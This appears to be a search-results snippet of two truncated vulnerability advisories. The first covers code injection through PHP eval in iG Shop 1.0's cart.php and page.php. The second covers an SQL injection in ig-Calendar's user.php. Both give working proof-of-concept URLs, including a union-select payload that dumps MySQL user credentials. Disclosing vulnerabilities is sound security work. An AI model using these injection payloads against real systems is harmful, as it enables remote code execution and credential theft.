2 matches found
iG Shop 1.0 Multiple Remote Vulnerabilities
"If eval is the answer, then you are asking the wrong question." --Unknowen ig-shop suffers from two eval's that can be controlled by an attacker: http://127.0.0.1/igshop/cart.php?action=;phpinfo;// ./cart.php line 692: eval "cart$action;"; http://127.0.0.1/igshop/page.php?action=;phpinfo;//...
igcal10-sql.txt
SQL Injection in ig-Calendar. This works regardless of magicquotesgpc! Dumps mysql login informaion: http://127.0.0.1/ig-calendar/user.php?id=999%20union%20select%201,User,Password,Host,Filepriv,0%20from%20mysql.user ./user.php line 52: $query = 'SELECT FROM users WHERE id='.$id; Should have used...